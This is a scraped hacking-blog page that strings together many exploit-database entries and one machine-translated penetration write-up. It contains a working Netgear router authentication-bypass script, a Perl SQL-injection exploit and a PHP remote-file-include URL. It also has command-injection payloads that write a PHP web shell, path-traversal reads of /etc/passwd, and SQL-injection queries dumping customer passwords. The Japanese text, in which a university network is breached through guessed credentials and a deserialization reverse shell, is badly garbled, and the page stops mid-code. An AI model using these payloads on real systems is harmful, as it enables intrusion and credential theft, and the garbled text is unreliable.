Source: https://code.google.com/p/google-security-research/issues/detail?id=605
Panic log attached
OS X advisory: https://support.apple.com/en-us/HT205731
iOS advisory: https://support.apple.com/en-us/HT205732
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39362.zip
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863594875
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Source: https://code.google.com/p/google-security-research/issues/detail?id=606
Panic log attached
OS X advisory: https://support.apple.com/en-us/HT205731
iOS advisory: https://support.apple.com/en-us/HT205732
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39361.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=607
Panic log attached
OS X advisory: https://support.apple.com/en-us/HT205731
iOS advisory: https://support.apple.com/en-us/HT205732
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39360.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=608
Panic log attached
OS X advisory: https://support.apple.com/en-us/HT205731
iOS advisory: https://support.apple.com/en-us/HT205732
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39359.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=618
The _ool variations of the IOKit device.defs functions all incorrectly deal with error conditions.
If you run the mig tool on device.defs you can see the source of the kernel-side MIG handling code; here
is the relevant generated code for io_service_get_matching_services_ool:
mig_internal novalue _Xio_service_get_matching_services_ool
(mach_msg_header_t *InHeadP, mach_msg_header_t *OutHeadP)
{
... // some typedefs
Request *In0P = (Request *) InHeadP;
Reply *OutP = (Reply *) OutHeadP;
kern_return_t RetCode;
io_object_t existing; <-- (a)
... // check the input types
RetCode = is_io_service_get_matching_services_ool(In0P->Head.msgh_request_port, (io_buf_ptr_t)(In0P->matching.address), In0P->matchingCnt, &OutP->result, &existing); <-- (b)
if (RetCode != KERN_SUCCESS) {
MIG_RETURN_ERROR(OutP, RetCode);
}
OutP->existing.name = (mach_port_t)iokit_make_object_port(existing); <-- (c)
At (a) it declares an io_object_t existing on the stack (io_object_t is just a pointer.) It then passes the address of that local to is_io_service_get_matching_services_ool, and if that
function succeeds passes the value of existing to iokit_make_object_port. Here's is_io_service_get_matching_services_ool (which importantly is NOT generated code):
/* Routine io_service_get_matching_services_ool */
kern_return_t is_io_service_get_matching_services_ool(
mach_port_t master_port,
io_buf_ptr_t matching,
mach_msg_type_number_t matchingCnt,
kern_return_t *result,
io_object_t *existing )
{
kern_return_t kr;
vm_offset_t data;
vm_map_offset_t map_data;
kr = vm_map_copyout( kernel_map, &map_data, (vm_map_copy_t) matching );
data = CAST_DOWN(vm_offset_t, map_data);
if( KERN_SUCCESS == kr) {
// must return success after vm_map_copyout() succeeds
*result = internal_io_service_get_matching_services(master_port,
(const char *) data, matchingCnt, existing);
vm_deallocate( kernel_map, data, matchingCnt );
}
return( kr );
}
Note here that it returns kr which *only* indicates if the vm_map_copyout failed. This will of course succeed so the return value of this function
will always be KERN_SUCCESS, even if internal_io_service_get_matching_services fails... Let's look at that function:
static kern_return_t internal_io_service_get_matching_services(
mach_port_t master_port,
const char * matching,
mach_msg_type_number_t matching_size,
io_iterator_t *existing )
{
kern_return_t kr;
OSObject * obj;
OSDictionary * dict;
if( master_port != master_device_port)
return( kIOReturnNotPrivileged);
obj = matching_size ? OSUnserializeXML(matching, matching_size)
: OSUnserializeXML(matching);
if( (dict = OSDynamicCast( OSDictionary, obj))) {
*existing = IOService::getMatchingServices( dict );
kr = kIOReturnSuccess;
} else
kr = kIOReturnBadArgument;
if( obj)
obj->release();
return( kr );
}
Indeed, if this function fails it doesn't set existing to a safe value but does return an error code. However, the _ool variation ignores this error code (it
just returns it to userspace via the result parameter.) This means that the generated code thinks that is_io_service_get_matching_services_ool succeed
and it therefore pass existing in iokit_make_object_port which will eventually (if the uninitialized value wasn't NULL) call a virtual function on it
(taggedRetain) when adding the object to the dictionary storing all iokit user objects.
All of the _ool variations of IOKit API's have this problem; PoCs are included for all of them but they may or may not crash depending on the
state of the stack.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39358.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=620
I wanted to demonstrate that these iOS/OS X kernel race condition really are exploitable so here's a PoC
which gets RIP on OS X. The same techniques should transfer smoothly to iOS :)
The bug is here:
void IORegistryIterator::reset( void )
{
while( exitEntry())
{}
if( done) {
done->release();
done = 0;
}
where->current = root;
options &= ~kIORegistryIteratorInvalidFlag;
}
We can call this from userspace via the IOIteratorReset method.
done is an OSOrderedSet* and we only hold one reference on it; therefore we can race two threads
to both see the same value of done, one will free it but before it sets done to NULL the other will
call ->release on the now free'd OSOrderedSet.
How to get instruction pointer control?
The XNU kernel heap seems to have been designed to make this super easy :) When the first thread frees
done zalloc will overwrite the first qword of the allocation with the freelist next pointer (and the last qword
with that pointer xor'd with a secret.) This means that what used to be the vtable pointer gets overwritten
with a valid pointer pointing to the last object freed to this zone. If we can control that object then
the qword at +0x28 will be called (release is at offset +0x28 in the OSObject vtable which is the base
of all IOKit objects including OSOrderedSet.)
This PoC uses OSUnserializeXML to unserialize an OSData object with controlled contents then free it, which
puts a controlled heap allocation at the head of the kalloc.80 freelist giving us pretty easy instruction pointer control.
I've attached a panic log showing kernel RIP at 0xffffff8041414141. You will probably have to fiddle with the
PoC a bit to get it to work, it's only a PoC but it does work! (I have marked the value to fiddle with :) )
As a hardening measure I would strongly suggest at the very least flipping the location of the obfuscated and
unobfuscate freelist pointers such that the valid freelist pointer doesn't overlap with the location of the
vtable pointer.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39357.zip
'''
# Exploit Title: Netgear_WNR1000v4_AuthBypass
# Google Dork: -
# Date: 06.10.2015
# Exploit Author: Daniel Haake
# Vendor Homepage: http://www.netgear.com/
# Software Link: http://downloadcenter.netgear.com/en/product/WNR1000v4
# Version: N300 router firmware versions 1.1.0.24 - 1.1.0.31
# Tested on: Can be exploited using a browser
# CVE : requested
Introduction:
-------------
Multiple NETGEAR wireless routers are out of the box vulnerable
to an authentication bypass attack. No router options has to
be changed to exploit the issue. So an attacker can access the administration
interface of the router without submitting any valid username and
password, just by requesting a special URL several times.
Affected:
---------
- Router Firmware: N300_1.1.0.31_1.0.1.img
- Router Firmware; N300-1.1.0.28_1.0.1.img
- Router Firmware; N300-1.1.0.24_1.0.1.img
- tested and confirmed on the WNR1000v4 Router with both firmwares
- other products may also be vulnerable because the firmware is used in multiple devices
Technical Description:
----------------------
The attacker can exploit the issue by using a browser or writing a simple exploit.
1. When a user wants to access the web interface, a http basic authentication login process is initiated
2. If he does not know the username and password he gets redirected to the 401_access_denied.htm file
3. An attacker now has to call the URL http://<ROUTER-IP>/BRS_netgear_success.html multiple times
-> After that if he can access the administration web interface and there is no username/password prompt
Example Python script:
----------------------
'''
import os
import urllib2
import time
import sys
try:
first = urllib2.urlopen("http://" + sys.argv[1])
print "No password protection!"
except:
print "Password protection detected!"
print "Executing exploit..."
for i in range(0,3):
time.sleep(1)
urllib2.urlopen("http://" + sys.argv[1] + "/BRS_netgear_success.html")
second = urllib2.urlopen("http://" + sys.argv[1])
if second.getcode() == 200:
print "Bypass successfull. Now use your browser to have a look at the admin interface."
'''
Workaround/Fix:
---------------
None so far. A patch already fixing this vulnerability was developed by Netgear but not released so far
(see timeline below).
Timeline:
---------
Vendor Status: works on patch-release
'''
21.07.2015: Vendor notified per email (security@netgear.com)
-> No response
23.07.2015: Vendor notified via official chat support
24.07.2015: Support redirected notification to the technical team
29.07.2015: Requested status update and asked if they need further assistance
-> No response
21.08.2015: Notified vendor that we will go full disclosure within 90 days if they do not react
03.09.2015: Support again said that they will redirect it to the technical team
03.09.2015: Netgear sent some beta firmware version to look if the vulnerability is fixed
03.09.2015: Confirmed to Netgear that the problem is solved in this version
Asked Netgear when they plan to release the firmware with this security fix
11.09.2015: Response from Netgear saying they will not disclose the patch release day
15.09.2015: Asked Netgear again when they plan to publish the security fix for the second time
-> No response
29.09.2015: Full disclosure of this vulnerability by SHELLSHOCK LABS
06.10.2015: Forced public release of this advisory to follow up on [2]
References:
-----------
[1] http://support.netgear.com/product/WNR1000v4
[2] http://www.shellshocklabs.com/2015/09/part-1en-hacking-netgear-jwnr2010v5.html
# Title: Ramui web hosting directory script 4.0 Remote File Include Vulnerability
# Author: bd0rk
# Twitter: twitter.com/bd0rk
# Vendor: http://www.ramui.com
# Download: http://ramui.com/directory-script/download-v4.html
Proof-of-Concept:
/gb/include/connection.php lines 6-13 in php-sourcecode
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class connection
{
protected $site;
public $error=false;
protected $admin=false;
function __construct($root)
{
include $root."database/config.php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The $root-parameter is a __construct.
But no value was passed to him.
Therefore, nothing can be checked before include in line 13.
So an attacker can execute malicious shellcode about it.
In this case, the __construct is meaningless.
[+]Exploit: http://[server]/path/gb/include/connection.php?root=[YourShellcode]
~~Everything revolves. Even the planet. :)~~
***Greetz to ALL my followers on Twitter!***
/bd0rk
0x01情報収集
まず、指定されたターゲットはxxx大学の公式ウェブサイト:wwwww.xxx.edu.cnですが、実際にはメインサイトだけをテストしないでください。一般に、このようなメインサイトは比較的安全であり、一部のサイトグループシステムを使用する可能性があります。多くの学校がBodaの統一管理を使用しています。
1.サブドメイン名収集
は、サブドメイン3、ファズドメイン、サブドメインブルート、seayサブドメイン名を爆破するために使用できます
しかし、私はこの浸透で上記を使用せず、爆破時間は長すぎました。
私はこれらのFOFA、Shadon、およびこれらのサイバースペース検索エンジンを使用しています
たとえば、次の写真:
host='xxxx.edu.cn'
2.ポート情報
上記のFOFA結果を介して、ポートスキャンツールを使用してIPアドレスとスキャンを学習できます。利用可能なポートは見つかりません
ただし、多くのWebサイトにはこのIPがあります。
その後、ポートをあきらめます
3.感受性情報収集
Github検索GoogleハッキングLingfengyunネットワークディスク検索で、いくつかの繊細なものを収集しませんでした。メールアドレスはTencentの企業メールアドレスであり、VPNは次のようになります
収集されたメールアカウントの一部は次のとおりでした
Webサイトを閲覧して、いくつかのイントラネットシステムのコルプス
統一認証プラットフォームのプロンプトを表示することにより、一部のソーシャルワーカーは、学生番号を使用してIDカードを追加した後に学生がログインできることを知っています(デフォルトのパスワード)
だから私は学生番号の波を収集してバックアップしました
site:xxx.edu.cn学生ID
0x02脆弱性マイニング
必要な情報の一部を収集した後、各サブドメインを掘り始めました。長い間検索した後、ほとんどのシステムは、比較的単一の機能を備えた統一テンプレートを使用し、抜け穴は見つかりませんでした。
site:xxx.edu.cn inurl:login
site:xxx.edu.cn intitle:login
次に、いくつかのログインシステムに焦点を当てました
その後、ログインするシステムが見つかりました
この時点で、私は彼のプロンプトを思い出しました。ユーザー名とパスワードは私の仕事番号です。つまり、ここに教師の仕事番号情報があるかもしれませんが、私はただ幸運です。このシステムのシステム管理者アカウントは、パスワードが弱いです。
管理者が背景に入った後、ユーザー情報を見つけて、教師のアカウントが5桁であることを知ります。アドレスバーにアクションがあることがわかります。 STR2をテストした後、Webページを更新しましたが、開くことができませんでした。私は視覚的にIPがブロックされていることを発見しました.
次に、ユーザーのルールを知った後、辞書のバックアップとして使用するスクリプトを書きました
#!/usr/bin/env python
# - * - Coding:UTF-8-* -
#DateTime :2019/7/10 8:44
begin_num=0#数字から開始パラメーター生成を開始します
end_num=20000#endパラメーター停止nthパラメーター
印刷( '' ''
スクリプトを実行した後、5.txtはスクリプトが配置されているディレクトリで生成され、生成された番号が保存されます。
'' ')
範囲のi(begin_num、end_num + 1):
I 10:の場合
i='0000' + str(i)
Elif I 100:
i='000' + str(i)
Elif I 1000:
i='00' + str(i)
Elif I 10000:
i='0'+str(i)
f: as open( '5.txt'、 'a')
f.write(str(i) + '\ n')
print( 'プログラムが実行され、ファイルが生成されました')
次に、この背景に注入を見つけてアップロードしましたが、それは実りがありませんでしたので、テキストに記録し、別のドメイン名に変更しました。
次に、コース選択システムをご覧ください
は、学生アカウントをアカウントのパスワードとして使用し、正常にログインすることです
は役に立たないようですが、これについて気分が悪くなっているのは、テストをアップロードしたときにスクリプト形式の接尾辞を変更し、データパケットを送信できなかったことです。その結果、私は更新するためにWebページに戻り、リンクがリセットされました.そうです、私は再びIPで禁止されました.
それから私は教師アカウントを破ろうとしました、そして同じアカウントがパスワードとして使用されました
入った後、私は周りを見回しましたが、まだ進歩することができませんでした
同様に、私は大学院管理システムと学生支払いクエリシステムに入りました(実際にはただのクエリでした.)、最終的にFinancial XXシステムで少し進歩しました。
はい、それを正しく読んで、ID番号を読んだので、私は精神遅滞で100回試してみて、IDカードを含む14の教師アカウントを取得しましたが、それらはすべて退職した教師のように見えます。
それから私はログインを試してみるために統一されたID認証プラットフォームに来ましたが、ログインしました.(アカデミックアフェアーズはログインできません)
ここで始めましたが、これはブレークスルーと見なされました。このブレークスルーポイントなど、ここの一部のシステムは認証なしでは開くことができないため:アパートメント管理システム
認証前に:を開きます
認証後に開く:
実際には許可がありません.クリックしてもう一度ログインすると、このシステム
にアクセスできます。これにより、このシステムは統一された認証プラットフォームにログインしたユーザーが使用できることも証明しました。その後、このシステムにはJavaの敏lialializationの脆弱性があることが起こります
したがって、この敏arialializationの脆弱性(Shiro Deserialization)を通じて、リバウンドシェルが取得され、マシンはルート許可です
その後、エージェントトラフィックはその背後にあります。犬の穴を使用する場合、これ以上の話を無駄にしません.
それから私は今まで見たことがないWAFを見つけました
驚き、2番目のマスターが駅を守り、後退し、ごめんなさい、邪魔をしました。
0x03要約
1。情報収集サブドメイン名:FOFA(host='xxxx.edu.cn')ポートコレクション:Yujianスキャンツール、ウェブサイトは、逆プロキシポートを使用してポート443または80のみを使用して、ネットワークを出て敏感な情報を収集することができます。 Baidu Network Disk and Tencent Network Disk)3。Googハック学生番号を収集する番号:site3:xxx.cn学生番号ログイン:site:xxx.edu.cn inurl3360loginまたはsite:xxx.edu.edu.edu.edu.edu.cn intitle:log in subage cotain in homepain in homepain in homepain in to homepaint in home poight of of of of offution 3.統一された認証プラットフォームが作業番号とIDカードを使用し、作業番号とIDカードの後に6桁にログインしていることを発見します。資産と実験室のプラットフォームが、ユーザー名とパスワードとして作業番号を使用していることを発見します。ここでは、弱いパスワード管理者と管理者を介してシステムを入力して教師の作業番号を取得できます。システムには、WAF 5で傍受されます。コース選択センター、アカウント、パスワードの両方が生徒数と教師の作業番号であることを発見します。システムのファイルアップロードもWAFによって傍受されます。 6.大学院管理システム、学生支払いクエリシステム、Financial XXシステムなどのその他のシステムには、すべてのアカウントとパスワードがあります。それらはすべて、作業番号があり、システムに入ることができます。教師のアカウントにバインドされたID番号を収集できます。 7.教師のアカウントとID番号を取得し、統一された認証プラットフォームを入力します。寮管理システムにログインできます(最初に統一認証システムにログインする必要がある前提条件)8。
# Title: Ramui forum script 9.0 SQL Injection Exploit
# Author: bd0rk
# Twitter: twitter.com/bd0rk
# Vendor: http://www.ramui.com/
# Download: http://ramui.com/forum-script/download-v9.html
# Google-Dork: n/a --->Script-Kiddie protection! :)
# Direct SQL-Path: n/a --->Script-Kiddie protection! :)
# Description: I've found a sql-injection vulnerability in this web-software.
# The vulnerable code is in /gb/include/page.php
# The problem is the GET-pagename.
# An attacker can use this exploitcode for unfiltered sql-queries.
# Vuln-Code in /gb/include/page.php:
#************************************************************************************************************************************
# <?php
# if(isset($_GET['pagename'])){
# $name=$_GET['pagename'];
# $query=sprintf("SELECT* FROM ".PREFIX."page WHERE pagename = '%s' AND publish = 'Y'",$xx_con->real_escape_string($name));
# }
#************************************************************************************************************************************
# [+]PERL-EXPLOITCODE(Copy&Paste):
#!/usr/bin/perl
print q{
++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ Ramui forum script 9.0 SQL Injection Exploit +
+ +
+ bd0rk || SOH-Crew +
+ +
+ Greetings from cold Germany +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++
};
use IO::Socket;
print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /ramui/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "gb/include/page.php?pagename=[sqlInjectionCodeHERE]".$user ;
print "
=> Exploit in process...\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "Exploit finished!\r\n\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";
}
exit();
}
}
#####################################################################################
Application: VLC media player
Platforms: Windows
Versions: Version 2.2.1
Author: Francis Provencher of COSIG
Website: http://www.protekresearchlab.com/
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
VLC media player (commonly known as VLC) is a portable, free and open-source, cross-platform media player andstreaming media server written by the VideoLAN project. VLC is available for desktop operating systems as also mobile platforms as Android, iPad, iPhone, and iPod Touch. VLC is also available on App stores such as Apple’s App Store. VLC media player supports many audio and video compression methods and file formats, including DVD-Video, video CD and streaming protocols. It is able to stream media over computer networks and to transcode multimedia files.[10]
(https://en.wikipedia.org/wiki/VLC_media_player)
#####################################################################################
============================
2) Report Timeline
============================
2016-01-26: Francis Provencher from Protek Research Lab’s report the issue to VLC;
2016-01-27: Publication of this advisory;
#####################################################################################
============================
3) Technical details
============================
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of VLC.
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
An heap memory corruption occured when VLC parsed an malformed MPEG-4 file that contain an invalid Sample Table and Sample Description (STSD) Atoms size. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/COSIG-2016-03.mp4
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39353.zip
###############################################################################
source: https://www.securityfocus.com/bid/68719/info
ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ol-commerce 2.1.1 is vulnerable; other versions may also be affected.
Http://www.example.com/maint/modules/home/index.php?lang=MF;echo "<?php
system(\$_GET['cmd']);?> \$Greats 2 MY=\"Love:D">shell.php
Your Shell
Http://www.example.com/maint/modules/home/shell.php?cmd=id
uid=100(asterisk) gid=101(asterisk) groups=101(asterisk) $Greats 2
MY="Love:D
source: https://www.securityfocus.com/bid/68719/info
ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ol-commerce 2.1.1 is vulnerable; other versions may also be affected.
Http://www.example.com/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00
source: https://www.securityfocus.com/bid/68719/info
ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ol-commerce 2.1.1 is vulnerable; other versions may also be affected.
Http://www.example.com/maint/modules/repo/repo.php?lang=../../../../../../../../etc/passwd%00
source: https://www.securityfocus.com/bid/68719/info
ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ol-commerce 2.1.1 is vulnerable; other versions may also be affected.
Http://www.example.com/maint/modules/asterisk_info/asterisk_info.php?lang=../../../../../../../../etc/passwd%00
source: https://www.securityfocus.com/bid/68719/info
ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ol-commerce 2.1.1 is vulnerable; other versions may also be affected.
Http://www.example.com/maint/modules/home/index.php?lang=../../../../../../../../etc/passwd%00
source: https://www.securityfocus.com/bid/68720/info
Trixbox is prone to the following security vulnerabilities:
1. An SQL-injection vulnerability
2. A cross-site scripting vulnerability
3. Multiple local file-include vulnerabilities
4. A remote code-execution vulnerability
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, to steal cookie-based authentication credentials, exploit latent vulnerabilities in the underlying database or perform certain unauthorized actions and gain access to the affected application.
Http://www.example.com/maint/modules/endpointcfg/endpoint_generic.php?action=Submit&mac=1' and 1=2 union select 1,2,3,4,5,6-- -
source: https://www.securityfocus.com/bid/68719/info
ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ol-commerce 2.1.1 is vulnerable; other versions may also be affected.
http://www.example.com/OL-Commerce/admin/create_account.php?action=edit
POST /OL-Commerce/admin/create_account.php?action=edit HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://www.example.com/OL-Commerce/admin/create_account.php?action=edit
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 301
default_address_id=&customers_gender=m&csID=100&customers_firstname=aaaa
&customers_lastname=bbbb&customers_email_address=email@hotmail.com
&entry_company=cccc&customers_vat_id=1212&entry_street_address=dddd
&entry_postcode=00961&entry_city=eeee&entry_country_id=118[SQL INJECTION]
&customers_telephone=12121233&customers_fax=23421424&status=0
&customers_mail=yes&payment_unallowed=&shipping_unallowed=
&entry_password=12121212&mail_comments=
[NOTE]
------
entry_country_id=118[SQL INJECTION]=118' and (select 1 from (select
count(*),concat((select(select
concat(cast(concat(database(),0x3a,version()) as char),0x7e)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1-- -
source: https://www.securityfocus.com/bid/68719/info
ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ol-commerce 2.1.1 is vulnerable; other versions may also be affected.
http://www.example.com/OL-Commerce/create_account.php
POST /OL-Commerce/create_account.php HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.example.com/OL-Commerce/create_account.php
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 301
action=process&gender=m&firstname=aaaaa&lastname=bbbb
&dob=17.05.1991&email_address=email@hotmail.com
&company=ccc&vat=1234&street_address=dddd&suburb=eeee
&postcode=00961&city=fffff&state=gggggg
&country=118[SQL
INJECTION]&telephone=45345325&fax=234234&password=12121212&confirmation=12121212&x=28&y=4
[NOTE]
------
country=118[SQL INJECTION]=118' and (select 1 from (select
count(*),concat((select(select
concat(cast(concat(database(),0x3a,version()) as char),0x7e)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1-- -
source: https://www.securityfocus.com/bid/68719/info
ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ol-commerce 2.1.1 is vulnerable; other versions may also be affected.
http://www.example.com/OL-Commerce/affiliate_show_banner.php?ref=1&affiliate_banner_id=1[SQL INJECTION]
source: https://www.securityfocus.com/bid/68719/info
ol-commerce is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ol-commerce 2.1.1 is vulnerable; other versions may also be affected.
http://www.example.com/OL-Commerce/affiliate_signup.php
POST /OL-Commerce/affiliate_signup.php HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101
Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.example.com/o/affiliate_signup.php
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 629
action=process&a_gender=m&a_firstname=haha&a_lastname=hahasdf&a_dob=457689
&a_email_address=email@hotmail.com&a_company=iiiiii&a_company_taxid=12
&a_payment_check=jjjjjj&a_payment_paypal=email@hotmail.com
&a_payment_bank_name=paypal
&a_payment_bank_branch_number=555555&a_payment_bank_swift_code=444444
&a_payment_bank_account_name=qqqqqq&a_payment_bank_account_number=3333333
&a_street_address=ddddddd&a_suburb=ccccccf&a_postcode=00961&a_city=bbbbbb
&a_country=118[SQL
INJECTION]&a_state=aaaaaa&a_telephone=22222222&a_fax=11111111&
a_homepage=http://iphobos.com/blog&a_password=12121212
&a_confirmation=12121212&a_agb=1&x=65&y=3
[NOTE]
------
a_country=118[SQL INJECTION]=118' and 1=2 union all select
group_concat(customers_id,0x3a,customers_email_address,0x3a,customers_password)+from+customers--
# Exploit Title: WordPress appointment-booking-calendar <=1.1.24 - SQL injection through ´addslashes´ (wordpress ´wp_magic_quotes´ function)
# Date: 2016-01-28
# Google Dork: Index of /wordpress/wp-content/plugins/appointment-booking-calendar/
# Exploit Author: Joaquin Ramirez Martinez [now i0 security-lab]
# Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Vendor: CodePeople.net
# Vebdor URI: http://codepeople.net
# Version: 1.1.24
# OWASP Top10: A1-Injection
# Tested on: windows 10 + firefox + sqlmap 1.0.
===================
PRODUCT DESCRIPTION
===================
"Appointment Booking Calendar is a plugin for **accepting online bookings** from a set of **available time-slots in
a calendar**. The booking form is linked to a **PayPal** payment process.
You can use it to accept bookings for medical consultation, classrooms, events, transportation and other activities
where a specific time from a defined set must be selected, allowing you to define the maximum number of bookings
that can be accepted for each time-slot."
(copy of readme file)
======================
EXPLOITATION TECHNIQUE
======================
remote
==============
SEVERITY LEVEL
==============
critical
================================
TECHNICAL DETAILS && DESCRIPTION
================================
A SQL injection flaw was discovered within the latest WordPress appointment-booking-calendar plugin version 1.1.24.
The flaw were found in the function that is executed when the action ´cpabc_appointments_calendar_update´ is called.
The action is added with ´init´ tag, so it function is called every time when parameter
´action=cpabc_appointments_calendar_update´ appear in the query string (GET request) or POST request.
Exploiting succesful this vulnerability we need a vulnerable wordpress site with especial character set for to bypass
the ´addslashes´ function (called automatically and applied in all variables $_POST and $_GET by wordpress ´wp_magic_quotes´
function) and we need own a calendar too (could be owned by privilege escalation) or be a user with ´edit_pages´ permission (admin|editor).
The security risk of SQL injection vulnerabilities are extremely because by using this type of flaw, an attacker
can compromise the entire web server.
================
PROOF OF CONCEPT
================
An unauthenticated attacker can make a request like...
http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=cpabc_appointments_check_posted_data
&cpabc_calendar_update=1&id=<owned calendar id>
Example:
Exploiting simple SQL injection:
http://localhost/wordpress/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update
&cpabc_calendar_update=1&id=1
Post data:
specialDates=&workingDates&restrictedDates&timeWorkingDates0&timeWorkingDates1&timeWorkingDates2
&timeWorkingDates3&timeWorkingDates4&timeWorkingDates5& imeWorkingDates6
All post variables are vulnerable to SQLi with ´addslashes´ bypass.
===============
VULNERABLE CODE
===============
located in ´cpabc_appointments.php´
function cpabc_appointments_calendar_update() {
global $wpdb, $user_ID;
